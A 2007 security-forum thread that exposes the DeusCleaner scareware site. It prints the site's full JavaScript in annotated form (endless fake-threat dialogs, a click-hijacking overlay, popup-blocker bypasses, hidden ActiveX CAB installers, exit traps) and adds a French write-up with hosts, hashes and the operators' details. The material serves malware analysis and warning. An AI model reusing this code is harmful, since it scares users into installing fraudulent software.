
deucecleaneronline.com



#1
MysteryFCM

Details at:

http://msmvps.com/blogs/spywaresucks/archi...19/1335216.aspx

#2
MysteryFCM

Woops, got the domain wrong ..... tis:

deuscleaneronline.com

#3
MysteryFCM

looking at its source, it's the following that does all the naughty loveliness;

deuscleaneronline.com/common/destrub.js

*****************************************************************
vURL Desktop Edition v0.2.0 Results
Source code for: http://deuscleaneronline.com/common/destrub.js
Server IP: 24.244.171.69
Date: 19 November 2007
Time: 23:21:22:21
*****************************************************************
//alert(h);
//java script:flashClick();

// Flipped to true by loading_done(); onClickDownload() consults it when choosing
// a download vector for Opera and for IE 5-7.
var loading_finished = false;
/**
* Marks page loading as complete by setting the loading_finished flag.
* Presumably wired to a load event by the hosting page - no caller appears in this file.
*/
function loading_done()
{
	//alert(loading_finished);
	loading_finished  = true;
}

/**
* Cross-browser event registration helper used by EventManager.
*
* @param <object> element - DOM node or window to attach to; a null element (e.g. a missed getElementById) throws a TypeError here
* @param <string> eventType - event name without the 'on' prefix
* @param <function> functionName - handler function
*
* @return true on the addEventListener path, the attachEvent result on IE, undefined on the legacy on<event> property fallback
*/
function addEvent(element, eventType, functionName) {
 if (element.addEventListener) {
 element.addEventListener(eventType, functionName, false);
 return true;
 } else if (element.attachEvent) {
 var r = element.attachEvent('on' + eventType, functionName);
 return r;
 } else {
 element['on' + eventType] = functionName;
 }
}

/*********************************** Begin of definitions of EventManager ************************************/
/**
* Class for manipulation with document events
*/

/**
* Constructor of EventManager
*
* Registers every entry of `input` immediately through this.addEvent. Later in this
* file the binding `EventManager` is overwritten with an instance (var EventManager = new EventManager()).
*
* @param <array> input - array of events, each an array (elementType, elementName, eventType, functionName); defaults to []
*/
function EventManager(input) {
 this.input = input || [];
 for (var i = 0, j = this.input.length; i < j; i++) {
 this.addEvent(this.input[i][0], this.input[i][1], this.input[i][2], this.input[i][3]);
 }
}

/**
* Add event
*
* Dispatches on elementType to the matching registration helper; unknown types are ignored silently.
*
* @param <string> elementType - how elementName is interpreted ('obj', 'id', 'class', 'tag')
* @param <string>/<object> elementName - the element itself (e.g. window) or its id / class / tag name (e.g. 'download_button')
* @param <string> eventType - type of event (aka 'click', 'load', 'unload')
* @param <function> functionName - handler function for the event
*
* @access - public
*/
EventManager.prototype.addEvent = function(elementType, elementName, eventType, functionName) {
switch (elementType) {
case 'obj':
addEvent(elementName, eventType, functionName);
break;
case 'id':
this.addEventById(elementName, eventType, functionName);
break;
case 'class':
this.addEventByClass(elementName, eventType, functionName);
break;
 case 'tag':
 this.addEventByTag(elementName, eventType, functionName);
 break;
 default:
 break;
 }
}

/**
* Add event by element ID
*
* Looks the element up with document.getElementById and delegates to addEvent;
* an unknown id yields null and addEvent then throws.
*
* @param <string> elementId - id of the html element the event is created for ('download_button')
* @param <string> eventType - type of event (aka 'click', 'load', 'unload')
* @param <function> functionName - handler function for the event
*
* @access - private
*/
EventManager.prototype.addEventById = function(elementId, eventType, functionName) {
 addEvent(document.getElementById(elementId), eventType, functionName);
}

/**
* Add event by element class
*
* Registers the handler on every element returned by getElementsByClass, which is
* not defined in this file (presumably supplied by the hosting page). Note that
* `elements`, `i` and `j` are assigned without `var` and so leak as globals.
*
* @param <string> className - class name of the html elements the event is created for ('download_buttons')
* @param <string> eventType - type of event (aka 'click', 'load', 'unload')
* @param <function> functionName - handler function for the event
*
* @access - private
*/
EventManager.prototype.addEventByClass = function (className, eventType, functionName) {
 elements = getElementsByClass(className);
 for (i = 0, j = elements.length; i < j; i++) {
 addEvent(elements[i], eventType, functionName);
 }
}

/**
* Add event by html tag
*
* Registers the handler on every element with the given tag name. As in
* addEventByClass, `elements`, `i` and `j` are implicit globals.
*
* @param <string> tagName - name of the html tag the event is created for ('span')
* @param <string> eventType - type of event (aka 'click', 'load', 'unload')
* @param <function> functionName - handler function for the event
*
* @access - private
*/
EventManager.prototype.addEventByTag = function (tagName, eventType, functionName) {
 elements = document.getElementsByTagName(tagName);
 for (i = 0, j = elements.length; i < j; i++) {
 addEvent(elements[i], eventType, functionName);
 }
}

//var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
//document.write("<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>");





//ajax object creation 
// XMLHttpRequest factory, oldest-IE-first: the JScript conditional-compilation block
// below (live code only in IE's JScript engine, an ordinary comment elsewhere) tries
// the MSXML ActiveX objects, then the standard constructor, then window.createRequest.
// xmlhttp stays false when none is available; the only consumer in this file is
// report_click(), which swallows the resulting error.
var xmlhttp=false;
/*@cc_on @*/
/*@if (@_jscript_version >= 5)
// JScript gives us Conditional compilation, we can cope with old IE versions.
// and security blocked creation of the objects.
try {
  xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
  try {
   xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  } catch (E) {
   xmlhttp = false;
  }
}
@end @*/
if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp = new XMLHttpRequest();
} catch (e) {
xmlhttp=false;
}
}
if (!xmlhttp && window.createRequest) {
try {
xmlhttp = window.createRequest();
} catch (e) {
xmlhttp=false;
}
}





/**
* Tracking beacon. Sends the page-level DESTRUB value (not defined in this file;
* presumably a campaign/affiliate tag) and the first path segment of the current
* URL to report.php on the scareware domain, then ignores the response. The whole
* body is wrapped in an empty catch, so a missing xmlhttp or a blocked request
* fails silently.
*
* Detection note: the GET to /report.php?ag=<tag>&num=<path segment> is a stable
* network indicator for this sample.
*/
function report_click()
{
 //alert("body click");
 //if(h == 1 && h == 2 ){onClickDownload();}
	
try{	
// local `location` shadows window.location inside this function
var location = window.location.href;
// searching from offset 8 skips the scheme and "//", so startInd is the "/" that ends the host
var startInd = location.indexOf("/", 8);
var lastInd = location.indexOf("/", startInd + 1);
// text between the first two path slashes; the name suggests a landing-page number
var lendingNum = location.substr(startInd + 1, lastInd - startInd - 1);

	xmlhttp.open("GET", "http://deuscleaneronline.com/report.php?ag=" + DESTRUB + "&num=" + lendingNum ,true);
	 xmlhttp.onreadystatechange=function() {
	  if (xmlhttp.readyState==4) {
	   // response body is read but never used
	   var text = xmlhttp.responseText;
		  
	  }
	 }
 xmlhttp.send(null);
 }catch(exc)
 {}

 }
 
// Pool of scare texts drawn at random by destrub()'s confirm() loop. One entry
// imitates a Windows access-violation crash dialog. These literal strings are a
// usable static signature for this family.
var err_msgs = ["Question!\nClose access to all your favorites in Internet.\nPress \"OK\" if you agree","Attention!\nYour PC performance is much slower than needed. Do you want to fix the trouble?","Press \"OK\" for blocking the access to your confidential information.","Attention!\nYour private data are probably available to anybody in Internet.\nPress \"Cancel\" to get it blocked.", "Your private information can be available in Internet.\nPress \"OK\" for protecting of your confident information.","Attention!\nA privacy violation has been detected which can probably expose your credit  cards information for frauds.\nPress \"OK\" for blocking the access to your confidential information. ", "Error!\nAccepss violation at address 004FFB84 in module \'explorer.exe\'. Read of address 00F50D71A4.Press \"OK\" to fix. ", "Attention!\nA serious  threat has been detected in your web browser. Everybody can have access to you most confidential information.\nPress \"OK\"",   "Attention!\nThe internet viruses\' signatures have been detected on your PC.\nPress \"OK\" to remove immediately", "Attention!\nPrivacy violations have been detected on your PC, which can cause the private and confidential information losses.\nPress \"OK\" for immediate repair.", "The detected threats can obviously cause system crash and private information losses. Do you want to fix it now?"];
/**
* Main scare dialog. Both buttons end in onClickDownload(): OK calls it at once,
* Cancel enters a loop that re-prompts with a random err_msgs entry until the user
* presses OK. After about two dozen further Cancels it shows one more prompt, then
* escalates to iefinalPanic() on IE or start_onclose_panic() elsewhere and returns.
* No-op unless the page-level DESTRUB flag is set.
*/
function destrub()
{	
	
	if(!DESTRUB) return;
	if(confirm("Danger! Your system is seriously exposed.\nIt is highly recommended to clean up the PC immediately."))
	{	
		onClickDownload();
	}else{
	var counter = 0;
	var randomnumber = Math.floor(Math.random()*(err_msgs.length ));
	var mes = err_msgs[randomnumber];
	
	// Cancel does not dismiss: each Cancel picks another message and asks again
	while(!confirm(mes))
	{
		randomnumber = Math.floor(Math.random()*(err_msgs.length ));
		mes = err_msgs[randomnumber];
	
		counter ++;
		if(counter > 24) 
		{
			if(confirm("Attention!\nThe internet viruses\' signatures have been detected on your PC.\nPress \"OK\" to remove immediately"))
			{
				// author's note: the following line must stay commented until the graphic alert popup is clickable with the download triggered in onclick
				onClickDownload();
			}
			
			// escalation: IE gets the shrunken-window confirm loop, others the "non-closer" overlay
			if(navigator.appVersion.indexOf('MSIE') > 0)
				iefinalPanic();
			else 
				start_onclose_panic();
			return;
		}
	}
	// reached only when a confirm() in the loop returned OK
	onClickDownload();
	} 
}

/**
* Shows the 'non-closer' element when the page-level DESTRUB flag is set.
* `$` is not defined in this file - presumably a getElementById-style helper from the hosting page.
*/
function activate_onclose_panic()
{
	if(!DESTRUB) return;
	else $('non-closer').style.display ="block";
}
/**
* Shows the 'non-closer' element and sizes it to 70% of the screen height.
* Called by destrub() as the non-IE escalation step.
*/
function start_onclose_panic()
{
	$('non-closer').style.display = 'block';
	$('non-closer').style.height = (parseInt(window.screen.height*0.7)  ) + 'px';//'100px';
}
//error stuff loadiframe
// CleanerInstall.exe\	
/**
* IE escalation step. Shrinks the browser window to 10x10 px near the screen
* centre, then blocks in an empty-bodied while loop that re-issues confirm()
* until OK is pressed - Cancel cannot dismiss it. Afterwards calls download()
* and restores the window to full screen size.
*/
function iefinalPanic()
{
	var old_h = window.screen.height;
	var old_w = window.screen.width;
	var h = (window.screen.height )/2 - 100;
	var w = (window.screen.width )/2 - 100;
	window.resizeTo(10,10);
	window.moveTo(w,h);
	// loop body is intentionally empty: the only exit is OK
	while(!confirm("If you want to prevent threats for the PC - press \"OK\".\nIf you refuse to check your system, press \"Cancel\", and you agree to be responsible for all the \nsystem malfunctions and private information losses." ));
	download();
	window.moveTo(0,0);
	window.resizeTo(old_w,old_h);
	
}
/**
* Single-prompt variant of iefinalPanic(): shrinks and centres the window, asks
* once, restores the window, and calls download() only if OK was pressed.
* No caller appears in this file.
*/
function final_panic()
{
	var old_h = window.screen.height;
	var old_w = window.screen.width;
	var h = (window.screen.height )/2 - 100;
	var w = (window.screen.width )/2 - 100;
	window.resizeTo(10,10);
	window.moveTo(w,h);
	if(confirm("If you want to prevent threats for the PC - press \"OK\".\nIf you refuse to check your system, press \"Cancel\", and you agree to be responsible for all the \nsystem malfunctions and private information losses." ))
	{
		window.moveTo(0,0);
		window.resizeTo(old_w,old_h);
		//$('down-link').click();
		//var dlink =  "http://deuscleaner.com/download/CleanerInstall.exe";
		download();
		//location.href = dlink;
	}else {
		window.moveTo(0,0);
		window.resizeTo(old_w,old_h);
	}
}

// Installer paths on the serving domain (relative). dlink is what every download
// vector below actually requests; dlink_exe is declared but never referenced in
// this file. `downloaded` is set by download() and read by the exit trap.
var dlink =  "/download/";
var dlink_exe =  "/download/CleanerInstall.exe";
var downloaded = false;
/**
* Opens dlink: on IE6 through the 'iie' object's launchURL method, elsewhere by
* changing document.location. Errors are swallowed. No caller appears in this file.
*/
function nag_download()
{
	if(navigator.appVersion.indexOf('MSIE 6.') > 0)
	{
	//alert('ie6 download');
	try{
		$('iie').launchURL(dlink);
	}catch(exc){
	//alert(exc.message);
	}
	
	}else
	try{
	document.location.href =  dlink;
	}catch(exc){
	//alert(exc.message);
	}

}
	
// downloading_is_coming is never read in this file.
// onclick_download is the 500 ms re-entrancy latch used by onClickDownload().
window.downloading_is_coming = false;
window.onclick_download = true;

/**
* Clears window.ext_desctrub for 4 seconds. OnUnloadHandler() returns early while
* ext_desctrub is true, so the unload trap only fires inside that window.
* No caller appears in this file.
*/
function block_exit()
{
	window.ext_desctrub = false;
	setTimeout(function (){  window.ext_desctrub = true; }, 4000);
}
// download_exit_timeout is only referenced from commented-out code.
// ext_desctrub: see block_exit(). exit_block_counter: bumped by onClickDownload(),
// decremented by the onbeforeunload trap so a download-triggered navigation passes.
window.download_exit_timeout = null;
window.ext_desctrub	= true;
window.exit_block_counter = 0;
/**
* Download trigger reached from the invisible overlay injected by ver() and from
* the scare dialogs. Guarded by window.onclick_download, a 500 ms latch against
* repeated clicks. Bumps window.exit_block_counter (by 2 on first use, by 1 after)
* so the onbeforeunload trap lets the navigation caused by this download pass
* without another prompt. Vector by browser: hidden iframe for Netscape-family
* (and Opera once loaded), location change for IE 5-7 once loaded, else window.open.
*/
function onClickDownload()
{
	
	//alert('onclicl download done');
	
	//alert(loading_finished + 'setting up:' + window.ext_desctrub);
	//alert(window.ext_desctrub);
	
	/*
	if()
	{
		//alert('ie6 downloads');
		document.location.href = dlink;
	}
	*/
	
	/*
		if(window.download_exit_timeout != null)
		{
			//console.debug("clear timeout " + window.ext_desctrub);
			clearTimeout(window.download_exit_timeout );
		}
		window.download_exit_timeout  = setTimeout(function (){   window.ext_desctrub = true; 
			window.download_exit_timeout = null;
			//console.debug("timeout elapsed " + window.ext_desctrub);
		}, 4000);
	
	window.ext_desctrub = false;
	*/
	
	
	//alert(loading_finished);	
	if(window.onclick_download)
	{ 
		// first click grants two free unloads, later clicks one each (see the exit trap)
		if(window.exit_block_counter == 0)
		window.exit_block_counter += 2;
	else window.exit_block_counter ++;
	//alert(window.exit_block_counter);
	
		window.onclick_download = false;
		setTimeout(function (){window.onclick_download = true; }, 500);
		
	if(navigator.appName.indexOf('Netscape') >= 0 ||(navigator.userAgent.toLowerCase().indexOf("opera") != -1 && loading_finished))
	{
		// hidden iframe pointed at the installer path
		var element = document.createElement("iframe");
		element.setAttribute("src",dlink);
		element.style.display ="none";
		document.body.appendChild(element);
		//alert("ie6 way done");
		
	}else if((navigator.appVersion.indexOf('MSIE 7') >0 || navigator.appVersion.indexOf('MSIE 6') >0||navigator.appVersion.indexOf('MSIE 5') > 0) && loading_finished){
	//alert(location.href +  );
		document.location.href = dlink;
		}else{
		window.open(dlink, 'somename');
		window.focus();
	}
	
	/**
	author's note: added to solve the following problem -
	to avoid the onunload event, its handler needs to be removed and added again after the install link is entered
	***/
	}
}
/**
* Final download step. Clears the page-level DESTRUB flag, marks `downloaded`,
* hides the 'non-closer' element if present, then opens dlink by browser:
*  - IE 6/7: a tiny window.open when 'InfoPath' is in appVersion, otherwise the
*    'iie' object's launchURL (the commented-out object tag near the top of this
*    file gives it the classid of the Windows Media Player control, whose
*    launchURL opens a URL in the browser - a popup-blocker bypass) with
*    window.open as fallback.
*  - IE 5: plain window.open.
*  - everything else: a hidden iframe.
*/
function download()
{
	DESTRUB = false;
	downloaded = true;
	
	if(!!$("non-closer")) 
		$("non-closer").style.display = 'none';
	
	if(navigator.appVersion.indexOf('MSIE 7.') > 0 || navigator.appVersion.indexOf('MSIE 6.') > 0)
	{
		if(navigator.appVersion.indexOf('InfoPath') > 0)
		{
			window.open(dlink,"download","status=1,width=10,height=10");
			window.focus();
		}else{
		
			try {
				$('iie').launchURL(dlink);
			} catch (er) {
				//alert(er + "remove in future (for testing now)");
				window.open(dlink,"download2","status=1,width=10,height=10");
			}
			
			
		}
		
	}else if(navigator.appVersion.indexOf('MSIE 5.') > 0){
		var myWin = window.open(dlink);
		myWin.parent = null;
	}else {	
	//window.location = dlink;
	var element = document.createElement("iframe");
	element.setAttribute("src",dlink);
	element.style.display ="none";
	document.body.appendChild(element);
	}
	
}
//<OBJECT CLASSID="

/**
* IE5 variant of the ActiveX drop: document.write()s a hidden <OBJECT> whose
* CODEBASE points at /CleanerInstall.cab, which makes IE prompt to install the
* CAB. Only usable while the document is still being parsed (see the top-level
* `if(xx == 1)` block below). The CLSID string is a useful static indicator.
*/
function add_xx_control_ie5()
{
	document.write('<OBJECT CLASSID="CLSID:3BA4271E-5C1E-48e2-B432-D8BF420DD31D" CODEBASE="/CleanerInstall.cab" BORDER="0" HEIGHT="0" WIDTH="0" style="position:absolute; top:-100px;left:-100px;"></OBJECT>');
}
/**
* Generic ActiveX drop: injects the same hidden CAB-loading <OBJECT> as
* add_xx_control_ie5 via innerHTML on a new div appended to body. Only referenced
* from the commented-out block further down this file.
*/
function add_xx_control()
{
	//alert('adding activeX');
	var aElement=document.createElement('div');
	 aElement.innerHTML = '<OBJECT CLASSID="CLSID:3BA4271E-5C1E-48e2-B432-D8BF420DD31D" CODEBASE="/CleanerInstall.cab" BORDER="0" HEIGHT="0" WIDTH="0" style="position:absolute; top:-100px;left:-100px;"></OBJECT>';
	 document.body.appendChild(aElement); 
}

/**
* IE6 variant of the ActiveX drop; identical to add_xx_control() apart from the
* quote style. Called from scan_done().
*/
function add_xx_control_ie6()
{
	var aElement=document.createElement("div");
	aElement.innerHTML = '<OBJECT CLASSID="CLSID:3BA4271E-5C1E-48e2-B432-D8BF420DD31D" CODEBASE="/CleanerInstall.cab" BORDER="0" HEIGHT="0" WIDTH="0" style="position:absolute; top:-100px;left:-100px;"></OBJECT>';
	 document.body.appendChild(aElement); 
}
// Runs at script load: when the page-level flag `xx` (not defined here) is 1 and
// the browser is IE5, the CAB object is written into the document immediately.
// Other IE versions get it later from scan_done().
if(xx == 1 )
	{	
		if(navigator.appVersion.indexOf('MSIE 5.') > 0)
		{
			add_xx_control_ie5();
		}
	
}
	/**
	* IE7 variant of the ActiveX drop: writes the CAB-loading <OBJECT> into the
	* 'cab-cont' element. Note the CLSID here (3AA42713-...) differs from the one
	* used by the other add_xx_control_* variants (3BA4271E-...); both are indicators.
	*/
	function add_xx_control_ie7()
	{
		//alert('adding cab for ie7');
		//var aElement= 
		var b = '3AA42713-5C1E-48e2-B432-D8BF420DD31D';
		$('cab-cont').innerHTML = '<OBJECT CLASSID="CLSID:'+ b +'" CODEBASE="/CleanerInstall.cab" BORDER="0" HEIGHT="0" WIDTH="0" style="position:absolute; "></OBJECT>';
	}
	
/**
* Injects the CAB object on IE6 / IE7 when the page-level flag `xx` is 1.
* The name suggests it is called when the fake scan animation finishes; the
* caller is not in this file.
*/
function scan_done(){
	if(xx == 1)
	{	
		if(navigator.appVersion.indexOf('MSIE 6.') > 0 )
			add_xx_control_ie6();
			else if( navigator.appVersion.indexOf('MSIE 7.') > 0)
			{
				add_xx_control_ie7();
			}
	}
}

/**
* Page variant setup keyed on the page-level value `h` (not defined here).
* For h == 2 the body cursor becomes a hand/pointer everywhere. For h == 1 or 2 a
* fully transparent, absolutely positioned div covering 99% of the page is written
* into 'place-holder', so any click anywhere lands on onClickDownload() - a
* click-interception overlay.
*/
function ver()
{
if(h == 2)
{

if(navigator.appVersion.indexOf('MSIE 5.') > 0)
	document.body.style.cursor = "hand";
else 
	document.body.style.cursor = "pointer";

}

if(h ==1 || h==2)
{
	//alert('onclick event added');
	$('place-holder').innerHTML = '<div  onclick="onClickDownload()" style="background-color: #FFFFFF; opacity: 0.0;filter: alpha(opacity=0);  position:absolute; width:99%; height:99%; top:0; left:0; " ></div>';
	 
}

}

/*****
if(xx == 1)
	{
		//alert('attaching');
		if(!(navigator.appVersion.indexOf('MSIE 5.') > 0))
		{
			//alert('starting timeout');
			setTimeout(function() {add_xx_control();}, 500 );
		}
	}
*/

// //// // attach onclose question 
//alert(navigator.appName);

/**
* Opens the nag page: window.open on IE5, the 'iie' object's launchURL on IE6
* (errors swallowed), otherwise a plain location change. Skipped when the page
* is already the nag page (inNag, set further down this file).
*
* @param <string> adr - nag URL, built from dangerWindAdr by the exit trap
*/
function openDangerWindow(adr)
{
	if(inNag) return;
	
	if(navigator.appVersion.indexOf('MSIE 5.') > 0){
	window.open(adr);
	}else if(navigator.appVersion.indexOf('MSIE 6.') > 0){
		//alert('here we are');
		try{
			$('iie').launchURL(adr);
			}catch(ex)
			{
				//alert(ex.message);
				// loading forever !!! block popup ?;) hah hah hah 
			}
			//alert('hello');
	}else{
		//alert('just changing location');
		 location.href = adr;
	}
}

// Exit-trap configuration. dangerWindAdr is the nag URL; add_url is a page-level
// global not defined here. The `EventManager` binding is replaced by an instance:
// the right-hand side runs before the assignment, so the constructor is still
// available at that moment but not afterwards.
var dangerWindAdr = "/nag/?" + add_url + "&n=nag";
var EventManager = new EventManager();

// Two wordings of the same leave-page text, differing in which button is said to "prevent threats".
var exitMessage = "If you want to prevent threats for the PC - press \"OK\".\nIf you refuse to check your system, press \"Cancel\", and you agree to be responsible for all the \nsystem malfunctions and private information losses.";

var exitMessageCancel  = "If you want to prevent threats for the PC - press \"Cancel\".\nIf you refuse to check your system, press \"OK\", and you agree to be responsible for all the \nsystem malfunctions and private information losses.";

// On the nag page itself (window.nag set by the hosting page) the texts switch to
// the privacy-violation wording and inNag is recorded for the handlers below.
if(window.nag){
exitMessage = "Attention!\nA privacy violation has been detected which can probably expose your credit cards information for frauds.\nPress \"OK\" for blocking the access to your confidential information";
exitMessageCancel  = "Attention!\nA privacy violation has been detected which can probably expose your credit cards information for frauds.\nPress \"CANCEL\" for blocking the access to your confidential information";
window.inNag = true;

}else window.inNag = false;

// Exit trap, installed when the page-level flag `end` (not defined here) is 1.
// window.onunload_counter is assigned but never read in this file.
//  - IE7 / Netscape-family: an onbeforeunload handler. Unless onClickDownload()
//    has bumped window.exit_block_counter, it opens the nag URL (and on the
//    Netscape family also starts the download) and returns the scare text, which
//    the browser displays in its leave-page dialog.
//  - second branch: `indexOf('MSIE 6.')` is compared to nothing, and -1 (not
//    found) is truthy, so this branch catches every browser not matched above and
//    the final `else` is effectively unreachable. Its unload handler confirm()s
//    and opens the nag URL whichever button is pressed.
window.onunload_counter = 0;
if(end == 1)
{

if(navigator.appVersion.indexOf('MSIE 7.') > 0 || navigator.appName.indexOf('Netscape') >= 0  )
{
//alert('attaching event');	
 /*window.onunload = function (){ 
 alert(err_msgs[1]);
 }; 
	*/
	window.onbeforeunload = function(){
	
	//alert('unload ' + window.exit_block_counter);
	// counter is 0 unless a download click just happened; each pass consumes one
	if(window.exit_block_counter == 0)
	{
		if(inNag){
		//alert(exitMessage);
			onClickDownload();
			return exitMessageCancel;
		}
			//window.location = dlink;
			//
			openDangerWindow(dangerWindAdr + "&install=1");
			if(navigator.appName.indexOf('Netscape') >= 0 )
				download();
			
			window.exit_block_counter --;			
			return exitMessageCancel;
	}
 	window.exit_block_counter --;
	}

}else if(navigator.appVersion.indexOf('MSIE 6.') || (navigator.userAgent.toLowerCase().indexOf("opera") != -1) ) {

// Unload handler for the (over-broad) second branch; the `downloaded` check is hard-wired on.
function UnloadHandler(){
	//alert(window.ext_desctrub);
	//if(window.ext_desctrub) return false;
	if(inNag){
		alert(exitMessage);
			download();
			return;
	}
	//alert('unload');
	
	if(true /*!downloaded*/)
	{
	 // OK and Cancel both open the nag page; only the install flag differs
	 if(confirm(exitMessage)){
		  openDangerWindow(dangerWindAdr+ "&install=1");
		  }
		  else {
		  openDangerWindow(dangerWindAdr);
		  }
	  return false;
	  }
   }


   EventManager.addEvent('obj', window, 'unload', UnloadHandler);
//alert("ie6  way");
}else {

// Unload handler for the remaining browsers; skipped while ext_desctrub is true
// (i.e. outside the 4 s window opened by block_exit()) or once downloaded is set.
function OnUnloadHandler() { 
if(window.ext_desctrub) return false;
if(inNag)
{
	alert(exitMessage);
	download();
}else
if(!downloaded)
	{
	 
	 if(confirm(exitMessage))
	 {
		//download();
		openDangerWindow(dangerWindAdr + "&install=1");
		
	 }else openDangerWindow(dangerWindAdr);
			
	  
	  }
	  return false;
	}
	EventManager.addEvent('obj', window, 'unload', OnUnloadHandler);
	}
	

}

Drops a 97K file called CleanerInstall.exe. Sandbox results will be at the following once it's done :angry:)

http://research.sunbelt-software.com/viewm...aspx?id=2290409

Tried uploading to here but received;

Upload failed. The file was larger than the available space

#4
Pierre (aka Terdef)

Hi all

Original at http://assiste.forum...p=116961#116961

"Description de DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online)
DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online) est un logiciel crapuleux prétendant être un logiciel de sécurité de type Nettoyeur de disque (Classe des Anti-traces internes)


Description détaillée de DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online)
DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online) est un logiciel crapuleux prétendant être un logiciel de sécurité de type Nettoyeur de disque (Classe des Anti-traces internes). Il s’implante sur votre machine à votre insu, par un moyen ou par un autre
  • utilisation d’une faille de sécurité exploitée par un site piégé : un site Internet sur 62, soit plusieurs centaines de millions de sites Internet, contiennent une attaque de type « Drive-by Download » ( http://assiste.com.f...y_download.html ) qui inscrit de force un ou plusieurs parasites (adware…) dans votre ordinateur tandis que vous croyez naviguer paisiblement sur le Net
  • téléchargement d’un programme piégé : un logiciel sur 20 disponible sur le Net contient un ou plusieurs pièges (spywares, backdoor, keylogger… voir l’ABC à http://assiste.com.free.fr/p/abc/abc_de_la...r_internet.html )
  • clic sur un lien piège suggéré dans un e-mail, une zone de conversation immédiate (chat) etc. …
  • téléchargement d’un crack ou d’un hack (100% des hacks et cracks sont des pièges)
  • Téléchargement de Codecs ou pack de Codecs – la plupart sont piégés
  • Téléchargement d’un économiseur d’écran ou d’un fond d’écran – la plupart sont piégés
  • utilisation de la peur avec une publicité alarmante (fausse alerte de sécurité) simulant une analyse de votre machine (il s’agit d’une simple image animée sans aucune analyse) et prétendant y trouver de nombreux parasites ou autres éléments très dangereux pour vous
  • etc. …
Dans tous les cas, il est impossible à l’internaute « normal » de sortir de cette attaque sans que le mécanisme de l’escroquerie ne s’implante.

L’escroquerie vous harcèle alors sans cesse (toutes les 2 minutes) pour vous rappeler de télécharger gratuitement l’outil miracle nécessaire à l’analyse approfondie de votre ordinateur. Une fois ce téléchargement fait, seul moyen pour « calmer » le harcèlement dont vous êtes victime, l’outil miracle va confirmer l’analyse bidon et annoncer une liste d’erreurs et parasites imaginaires (« tromperie ») (et, peut-être, quelques-uns réels), inventant ainsi (ou exagérant) une menace.

Conclusion sur DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online)
Ne vous faites pas avoir !
Vous allez découvrir que l’outil prétendument gratuit n’est qu’une version de démonstration et que pour pouvoir « éradiquer réellement ses inventions » (sic !) il faut payer, très cher, beaucoup plus cher que le prix des produits des ténors de la sécurité, cet outil totalement inconnu, trompeur et parfaitement inefficace. C’est une escroquerie, au sens propre du terme, une crapulerie utilisant des méthodes de vente trompeuses et reposant sur la peur (une forme d’ingénierie sociale). Ne donnez jamais suite à cette attaque ni à aucune autre de même nature.



Informations techniques sur DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online)

Domaine = deuscleaneronline.com
Machine (host) = 24.244.171.69 ( 6 domaine(s) )

Prétend être un : Nettoyeur de disque (Classe des Anti-traces internes)

Classe de parasite = WinFixer
Clause de confidentialité (Privacy) = http://deuscleaner.com/privacy-policy/
Conditions générales (Terms) = http://deuscleaner.c...and-conditions/
Contrat de licence (EULA) = http://deuscleanerpay.com/license.php — Une clause de licence se trouve sur le domaine de paiement mais n'est pas accessible avant de passer à l'acte d'achat. Cette clause est également répétée au début de la procédure d'installation mais il n'est pas possible d'en sortir et de rejeter l'installation : http://deuscleanerpay.com/license.php

Image de l'arnaque =
Posted Image

Posted Image

Analyse =
Posted Image

Analyse demandée en SandBoxing : http://research.sunbelt-software.com/ViewM...aspx?id=2290409
Outgoing connections IP :
85.17.4.104 (HTTP)
64.28.177.250 (HTTP)
212.198.2.51 (DNS)
212.198.0.91 (DNS)


Outgoing connections Domaine :


Registrant prétendu = TORS BUISINESS LIMITED - Andreas Ellinas - Suite 2, Portland House, Glacis Road, - Gibraltar - Not Applicable,220174 - GI - Tel. +375.296324764
Registrar = ESTDOMAINS, INC.
Création = 18 06 2007

Téléchargement (dangereux - pour chercheurs uniquement) = hxxp://deuscleaneronline.com/download/CleanerInstall.exe

Installateur prétendu (Downloader) = CleanerInstall.exe
MD5 = e034b8bcdc7cfd0fcfc93ccbae26bc30
Sha1 = ea415585f0d0432938cc626cab99ebf51c662eec
CLSID = 87EAB0AB-F838-4EFC-AF41-6B0ADCC794AC

Certificat délivré à : Deus Cleaner Inc.
Adresse : hostmaster@deuscleaner.com
Validité : Du 15/08/07 au 15/08/08
Par : UTN-USERFirst-Object - http://www.usertrust.com - The USERTRUST Network - Salt Lake City - UT - US
Autorité de certification : COMODO.
UTN-USERFirst-Object est une des certifications de COMODO comme on peut le voir sur
http://www.comodo.co...tory/index.html
et dans le document ""Comodo Certification Practice Statement"" à
http://www.comodo.com/repository/09_22_200...ement_v.3.0.pdf
User Trust Inc ( http://www.usertrust.com ) a été acquis par COMODO depuis décembre 2004 ( http://www.prleap.com/pr/2534/ ).
Contre-signature : Aucune (none)

Probable opérateur = TORS BUISINESS LIMITED - Andreas Ellinas ? Peut-être un indépendant dans la mouvance du groupe Vério ou se servant de leur moyens logistiques (même attaque WinFixer, même logistique de paiement, même clause de licence, même attaque etc. ...)
Complice financier = https://secure.deusp...t.com/payment/? et https://secure.deusc...ay.com/payment/? : Le ""drive-by download"" ( http://assiste.com.f...y_download.html ) étant de la classe WinFixer et ces deux sites de paiement étant exactement identiques à celui du groupe Verio, on pense qu'il s'agit de DEDICATED PAYMENT SOLUTIONS LTD. - 10 COPTIC STREET, LONDON, WC1A 1NH

Le domaine est juridiquement et fiscalement sur une zone off-shore :
Le site est propriété et opéré par VERIO PRODUCTIONS LIMITED, AVENUE HOUSE, ST JULIAN'S AVENUE, ST PETER PORT, GUERNSEY GY1 1WA
Toutes les transactions financières sont exécutées par VERIO PRODUCTIONS LIMITED, AVENUE HOUSE, ST JULIAN'S AVENUE, ST PETER PORT, GUERNSEY GY1 1WA

Cette fiche sera ajoutée à la Crapthèque ( http://assiste.com.f...craptheque.html )
Sous le nom de http://assiste.com.free.fr/p/craptheque/de...aneronline.html lors de sa prochaine mise à jour.

#5
Pierre (aka Terdef)

Re,

7 other traps used by DeusCleaner
They are creative
:angry:


This post and next ones
